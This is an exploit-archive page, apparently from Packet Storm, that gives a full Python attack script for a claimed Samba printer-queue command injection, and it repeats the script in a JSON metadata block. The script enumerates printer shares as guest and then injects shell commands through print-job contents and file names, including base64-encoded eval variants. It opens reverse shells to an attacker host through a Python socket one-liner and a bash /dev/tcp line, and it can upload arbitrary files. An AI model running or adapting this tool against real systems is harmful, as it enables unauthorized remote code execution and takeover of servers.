📄 Samba SMB Printer Queue Command Injection / Remote Task...

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Python script is a structured exploitation framework targeting Samba print services exposed over SMB port 445. It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job...

Visit Original Source

Basic Information

ID PACKETSTORM:222477

Published Jun 2, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Samba 4.22.10, 4.23.8 and 4.24.3 – SMB Printer Queue Command Injection and Remote Task Delivery |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.samba.org/samba/security/CVE-2026-4480.html |
==================================================================================================================================

[+] Summary : This Python script is a structured exploitation framework targeting Samba print services exposed over SMB (port 445).
It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job submissions.

[+] POC :

#!/usr/bin/env python3

import socket
import sys
import argparse
import time
import re
import base64
import io
from threading import Thread
from smb.SMBConnection import SMBConnection
from smb.base import SharedDevice

class SambaPrintExploit:
def __init__(self, target_host, target_port=445, share_name="print$",
username="", password="", domain=""):
"""
Initialize Samba Print Server Exploit Structure
"""
self.target_host = target_host
self.target_port = target_port
self.share_name = share_name
self.username = username or "guest"
self.password = password or ""
self.domain = domain or "WORKGROUP"
self.connection = None
self.lhost = "127.0.0.1"
self.lport = 4444

def connect(self):
"""Establish SMB connection to target"""
try:
print(f"[*] Connecting to {self.target_host}:{self.target_port}")
self.connection = SMBConnection(
self.username,
self.password,
"exploit-client",
self.target_host,
domain=self.domain,
use_ntlm_v2=True,
is_direct_tcp=True
)

if self.connection.connect(self.target_host, self.target_port):
print(f"[+] Connected successfully as {self.username}")
return True
return False

except Exception as e:
print(f"[-] Connection failed: {e}")
return False

def list_printers(self):
"""List available printers on the server"""
try:
print("[*] Enumerating printers...")
shares = self.connection.listShares()

printers = []
for share in shares:
if share.is_printer:
printers.append(share.name)
print(f"[+] Found printer: {share.name}")

if not printers:
print("[-] No printers found")
return None

return printers

except Exception as e:
print(f"[-] Failed to list printers: {e}")
return None

def check_vulnerability(self, printer_name):
"""Check if the printer share responds properly to print requests"""
print(f"[*] Checking printer queue communication on: {printer_name}")
test_payload = "echo 'Testing Connection'"

try:
result = self.print_file(printer_name, test_payload, is_test=True)
if result:
print("[+] Target printer share accepted the print job request.")
return True
return False
except Exception as e:
print(f"[-] Check failed: {e}")
return False

def escape_payload(self, payload):
"""Generate formatted syntax variations for injection wrappers"""
injections = [
f"`{payload}`",
f"$({payload})",
f"; {payload} ;",
f"|| {payload} ||",
f"&& {payload} &&"
]
return injections

def create_malicious_print_job(self, command):
"""Create multi-stage script blocks using the validated command string"""
b64_cmd = base64.b64encode(command.encode()).decode()

payloads = [
f"'; {command} ; '",
f"`{command}`",
f"$({command})",
f"'; eval $(echo '{b64_cmd}' | base64 -d); '",
f"'; bash -c \"{command}\" ; '",
f"'; sh -c \"{command}\" ; '"
]
reverse_payload = f"'; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{self.lhost}\",{self.lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' ; '"
payloads.append(reverse_payload)

return payloads

def print_file(self, printer_name, command, is_test=False):
"""Send print job data handling payload string structures properly"""
try:
payloads = self.create_malicious_print_job(command)

for payload in payloads:
print(f"[*] Dispatching job format: {payload[:50]}...")
job_description = payload
try:
file_content = f"Job Name: {job_description}\nUser: {self.username}\n"
file_data = io.BytesIO(file_content.encode('utf-8'))

self.connection.printFile(
printer_name,
f"job_{int(time.time())}.txt",
file_data,
timeout=15
)
print(f"[+] Print job delivered to share: {printer_name}")
if not is_test:
return True
except Exception as e:
print(f"[-] Primary delivery method failed: {e}")
try:
empty_data = io.BytesIO(b"")
self.connection.printFile(
printer_name,
f"';{command};'.txt",
empty_data,
timeout=15
)
print(f"[+] Secondary empty-buffer delivery completed")
return True
except:
pass

return False

except Exception as e:
print(f"[-] Job packaging failed: {e}")
return False

def execute_command(self, command, printer_name=None):
"""Execute arbitrary command on target systems via queue tasks"""
if not printer_name:
printers = self.list_printers()
if not printers:
return False
printer_name = printers[0]

return self.print_file(printer_name, command)

def get_reverse_shell(self, lhost, lport, printer_name=None):
"""Configure parameters and trigger structural reverse connection string"""
self.lhost = lhost
self.lport = lport

shell_payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
print(f"[*] Queueing handler delivery targeting {lhost}:{lport}")
return self.execute_command(shell_payload, printer_name)

def upload_file(self, local_file, remote_path, printer_name=None):
try:
with open(local_file, 'rb') as f:
content = f.read()
b64_content = base64.b64encode(content).decode()
command = f"echo '{b64_content}' | base64 -d > {remote_path}"
return self.execute_command(command, printer_name)
except Exception as e:
print(f"[-] Pre-upload failure: {e}")
return False
def main():
parser = argparse.ArgumentParser(description='Samba Print Server Code Logic Verifier')
parser.add_argument('-t', '--target', required=True, help='Target IP address')
parser.add_argument('-p', '--port', type=int, default=445, help='SMB port')
parser.add_argument('-s', '--share', default='print$')
parser.add_argument('-u', '--username', default='guest')
parser.add_argument('-P', '--password', default='')
parser.add_argument('-d', '--domain', default='WORKGROUP')
parser.add_argument('-c', '--command', help='Command to run')
parser.add_argument('--printer')
parser.add_argument('--reverse-shell', action='store_true')
parser.add_argument('--lhost')
parser.add_argument('--lport', type=int, default=4444)
parser.add_argument('--list-printers', action='store_true')
parser.add_argument('--check', action='store_true')
parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'))
args = parser.parse_args()
exploit = SambaPrintExploit(
target_host=args.target,
target_port=args.port,
share_name=args.share,
username=args.username,
password=args.password,
domain=args.domain
)

if not exploit.connect():
sys.exit(1)

if args.list_printers:
exploit.list_printers()
sys.exit(0)

if args.check:
printers = exploit.list_printers()
if printers:
exploit.check_vulnerability(printers[0])
sys.exit(0)

if args.upload:
local_file, remote_file = args.upload
exploit.upload_file(local_file, remote_file, args.printer)
sys.exit(0)

if args.reverse_shell:
if not args.lhost:
print("[-] --lhost configuration value is mandatory for this operation.")
sys.exit(1)
exploit.get_reverse_shell(args.lhost, args.lport, args.printer)
sys.exit(0)

if args.command:
exploit.execute_command(args.command, args.printer)
sys.exit(0)

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-02T17:46:08",
    "description": "This Python script is a structured exploitation framework targeting Samba print services exposed over SMB port 445. It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job...",
    "published": "2026-06-02T00:00:00",
    "modified": "2026-06-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Samba SMB Printer Queue Command Injection / Remote Task Delivery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222477",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-4480"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Samba 4.22.10, 4.23.8 and 4.24.3 \u2013 SMB Printer Queue Command Injection and Remote Task Delivery                  |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.samba.org/samba/security/CVE-2026-4480.html                                                          |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is a structured exploitation framework targeting Samba print services exposed over SMB (port 445). \n                     It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job submissions.\n    \t\t\t\t \n    [+] POC        : \n    \n    #!/usr/bin/env python3\n    \n    import socket\n    import sys\n    import argparse\n    import time\n    import re\n    import base64\n    import io\n    from threading import Thread\n    from smb.SMBConnection import SMBConnection\n    from smb.base import SharedDevice\n    \n    class SambaPrintExploit:\n        def __init__(self, target_host, target_port=445, share_name=\"print$\", \n                     username=\"\", password=\"\", domain=\"\"):\n            \"\"\"\n            Initialize Samba Print Server Exploit Structure\n            \"\"\"\n            self.target_host = target_host\n            self.target_port = target_port\n            self.share_name = share_name\n            self.username = username or \"guest\"\n            self.password = password or \"\"\n            self.domain = domain or \"WORKGROUP\"\n            self.connection = None\n            self.lhost = \"127.0.0.1\"\n            self.lport = 4444\n            \n        def connect(self):\n            \"\"\"Establish SMB connection to target\"\"\"\n            try:\n                print(f\"[*] Connecting to {self.target_host}:{self.target_port}\")\n                self.connection = SMBConnection(\n                    self.username,\n                    self.password,\n                    \"exploit-client\",\n                    self.target_host,\n                    domain=self.domain,\n                    use_ntlm_v2=True,\n                    is_direct_tcp=True\n                )\n                \n                if self.connection.connect(self.target_host, self.target_port):\n                    print(f\"[+] Connected successfully as {self.username}\")\n                    return True\n                return False\n                \n            except Exception as e:\n                print(f\"[-] Connection failed: {e}\")\n                return False\n        \n        def list_printers(self):\n            \"\"\"List available printers on the server\"\"\"\n            try:\n                print(\"[*] Enumerating printers...\")\n                shares = self.connection.listShares()\n                \n                printers = []\n                for share in shares:\n                    if share.is_printer:\n                        printers.append(share.name)\n                        print(f\"[+] Found printer: {share.name}\")\n                \n                if not printers:\n                    print(\"[-] No printers found\")\n                    return None\n                    \n                return printers\n                \n            except Exception as e:\n                print(f\"[-] Failed to list printers: {e}\")\n                return None\n        \n        def check_vulnerability(self, printer_name):\n            \"\"\"Check if the printer share responds properly to print requests\"\"\"\n            print(f\"[*] Checking printer queue communication on: {printer_name}\")\n            test_payload = \"echo 'Testing Connection'\"\n            \n            try:\n     result = self.print_file(printer_name, test_payload, is_test=True)\n                if result:\n                    print(\"[+] Target printer share accepted the print job request.\")\n                    return True\n                return False\n            except Exception as e:\n                print(f\"[-] Check failed: {e}\")\n                return False\n        \n        def escape_payload(self, payload):\n            \"\"\"Generate formatted syntax variations for injection wrappers\"\"\"\n            injections = [\n                f\"`{payload}`\",\n                f\"$({payload})\",\n                f\"; {payload} ;\",\n                f\"|| {payload} ||\",\n                f\"&& {payload} &&\"\n            ]\n            return injections \n        \n        def create_malicious_print_job(self, command):\n            \"\"\"Create multi-stage script blocks using the validated command string\"\"\"\n            b64_cmd = base64.b64encode(command.encode()).decode()\n            \n            payloads = [\n                f\"'; {command} ; '\",\n                f\"`{command}`\",\n                f\"$({command})\",\n                f\"'; eval $(echo '{b64_cmd}' | base64 -d); '\",\n                f\"'; bash -c \\\"{command}\\\" ; '\",\n                f\"'; sh -c \\\"{command}\\\" ; '\"\n            ]\n            reverse_payload = f\"'; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"{self.lhost}\\\",{self.lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);' ; '\"\n            payloads.append(reverse_payload)\n            \n            return payloads\n        \n        def print_file(self, printer_name, command, is_test=False):\n            \"\"\"Send print job data handling payload string structures properly\"\"\"\n            try:\n                payloads = self.create_malicious_print_job(command)\n                \n                for payload in payloads:\n                    print(f\"[*] Dispatching job format: {payload[:50]}...\")\n                    job_description = payload\n                    try:\n                        file_content = f\"Job Name: {job_description}\\nUser: {self.username}\\n\"\n                        file_data = io.BytesIO(file_content.encode('utf-8'))\n                        \n                        self.connection.printFile(\n                            printer_name,\n                            f\"job_{int(time.time())}.txt\",\n                            file_data,\n                            timeout=15\n                        )\n                        print(f\"[+] Print job delivered to share: {printer_name}\")\n                        if not is_test:\n                            return True\n                    except Exception as e:\n                        print(f\"[-] Primary delivery method failed: {e}\")\n                    try:\n                        empty_data = io.BytesIO(b\"\")\n                        self.connection.printFile(\n                            printer_name,\n                            f\"';{command};'.txt\",\n                            empty_data,\n                            timeout=15\n                        )\n                        print(f\"[+] Secondary empty-buffer delivery completed\")\n                        return True\n                    except:\n                        pass\n                \n                return False\n                \n            except Exception as e:\n                print(f\"[-] Job packaging failed: {e}\")\n                return False\n        \n        def execute_command(self, command, printer_name=None):\n            \"\"\"Execute arbitrary command on target systems via queue tasks\"\"\"\n            if not printer_name:\n                printers = self.list_printers()\n                if not printers:\n                    return False\n                printer_name = printers[0]\n            \n            return self.print_file(printer_name, command)\n        \n        def get_reverse_shell(self, lhost, lport, printer_name=None):\n            \"\"\"Configure parameters and trigger structural reverse connection string\"\"\"\n            self.lhost = lhost\n            self.lport = lport\n            \n            shell_payload = f\"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"\n            print(f\"[*] Queueing handler delivery targeting {lhost}:{lport}\")\n            return self.execute_command(shell_payload, printer_name)\n    \n        def upload_file(self, local_file, remote_path, printer_name=None):\n            try:\n                with open(local_file, 'rb') as f:\n                    content = f.read()\n                b64_content = base64.b64encode(content).decode()\n                command = f\"echo '{b64_content}' | base64 -d > {remote_path}\"\n                return self.execute_command(command, printer_name)\n            except Exception as e:\n                print(f\"[-] Pre-upload failure: {e}\")\n                return False\n    def main():\n        parser = argparse.ArgumentParser(description='Samba Print Server Code Logic Verifier')\n        parser.add_argument('-t', '--target', required=True, help='Target IP address')\n        parser.add_argument('-p', '--port', type=int, default=445, help='SMB port')\n        parser.add_argument('-s', '--share', default='print$')\n        parser.add_argument('-u', '--username', default='guest')\n        parser.add_argument('-P', '--password', default='')\n        parser.add_argument('-d', '--domain', default='WORKGROUP')\n        parser.add_argument('-c', '--command', help='Command to run')\n        parser.add_argument('--printer')\n        parser.add_argument('--reverse-shell', action='store_true')\n        parser.add_argument('--lhost')\n        parser.add_argument('--lport', type=int, default=4444)\n        parser.add_argument('--list-printers', action='store_true')\n        parser.add_argument('--check', action='store_true')\n        parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'))  \n        args = parser.parse_args()   \n        exploit = SambaPrintExploit(\n            target_host=args.target,\n            target_port=args.port,\n            share_name=args.share,\n            username=args.username,\n            password=args.password,\n            domain=args.domain\n        )\n        \n        if not exploit.connect():\n            sys.exit(1)\n        \n        if args.list_printers:\n            exploit.list_printers()\n            sys.exit(0)\n        \n        if args.check:\n            printers = exploit.list_printers()\n            if printers:\n                exploit.check_vulnerability(printers[0])\n            sys.exit(0)\n            \n        if args.upload:\n            local_file, remote_file = args.upload\n            exploit.upload_file(local_file, remote_file, args.printer)\n            sys.exit(0)\n        \n        if args.reverse_shell:\n            if not args.lhost:\n                print(\"[-] --lhost configuration value is mandatory for this operation.\")\n                sys.exit(1)\n            exploit.get_reverse_shell(args.lhost, args.lport, args.printer)\n            sys.exit(0)\n        \n        if args.command:\n            exploit.execute_command(args.command, args.printer)\n            sys.exit(0)\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222477",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222477/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Samba SMB Printer Queue Command Injection / Remote Task Delivery_PACKETSTORM:222477

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply